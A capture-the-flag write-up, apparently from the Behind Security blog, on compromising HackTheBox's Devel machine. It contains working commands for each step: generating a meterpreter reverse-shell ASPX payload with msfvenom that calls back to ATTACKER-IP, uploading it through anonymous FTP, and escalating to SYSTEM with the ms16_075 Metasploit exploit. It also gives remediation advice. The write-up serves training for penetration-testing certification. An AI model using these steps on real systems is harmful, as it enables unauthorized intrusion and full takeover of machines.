Devel CTF Writeup
Table of Contents
ToggleThis is a writeup presented by Behind Security as part of the Road to OSCP series, focusing on the Devel CTF from HackTheBox.
Devel CTF
Devel, while relatively simple, demonstrates the security risks associated with some default program configurations. It is a beginner-level machine which can be completed using publicly available exploits.
HackTheBox
Hack The Box gives individuals, businesses and universities the tools they need to continuously improve their cybersecurity capabilities — all in one place.
Independent Challenge - 10.10.10.5
export IP=10.10.10.5
Service Enumeration
IP Address | Ports Open |
---|---|
10.10.10.5 | TCP: 21, 80 |
Initial Access - Writing files to the web server via a misconfigured FTP server
Vulnerability Explanation: Behind Security noticed that the FTP server mirrors the files of the web server on port 80, and an anonymous user has the ability to upload arbitrary files. By uploading a malicious apsx file that later got executed by the IIS http server on port 80, Behind Security was able to establish a foothold on the system.
Vulnerability Fix:
- Disable anonymous access to the FTP server to prevent unauthorized file uploads.
- Implement proper access controls and permissions on the web server's file directories, ensuring that only authorized users can modify or upload files.
- Regularly update and patch both the FTP server and the IIS web server software to the latest versions to address security vulnerabilities.
Severity: High
Steps to Reproduce the Attack:
- Generate a malicious aspx file using msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACKER-IP LPORT=54321 -f aspx > evil.aspx
- Run msfconsole:
msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST ATTACKER-IP; set LPORT 54321; run"
- Log in anonymously to the FTP server on port 21:
ftp [email protected]
- Upload your malicious aspx file:
ftp> put evil.aspx
- Make the web server execute the malicious aspx at
http://10.10.10.5/evil.aspx
Post Exploitation
LPE to Root
Vulnerability Explanation: Further enumeration of the system led to the discovery of a critical vulnerability that allows the user IIS APPPOOL\Web
to escalate privileges directly to NT AUTHORITY\SYSTEM
. The vulnerability's identification is ms16_075, and a public exploit is available.
Vulnerability Fix: Microsoft has released a fix for this known issue. It is recommended to conduct regular updates on the system.
Severity: Extreme
Steps to Reproduce the Attack:
- The attacker needs to have a meterpreter session on the victim machine.
- Background the session using the command
bg
- Use the exploit:
use exploit/windows/local/ms16_075_reflection_juicy
and set the SESSION variable. - Run the exploit on your meterpreter session and abuse your root privileges.
Conclusion
We hope you have found our content useful and invite you to explore more of our website to discover other interesting topics we cover. From cybersecurity to programming, we strive to provide our readers with the latest and most relevant information that can help them stay informed and ahead of the curve. We are committed to providing the best user experience to you and are open to feedback and suggestions through our contact form. Thank you for choosing Behind Security, we hope to see you again soon!
BEHIND SECURITY
Behind Security is an online platform dedicated to providing informative articles on cybersecurity, privacy, and programming.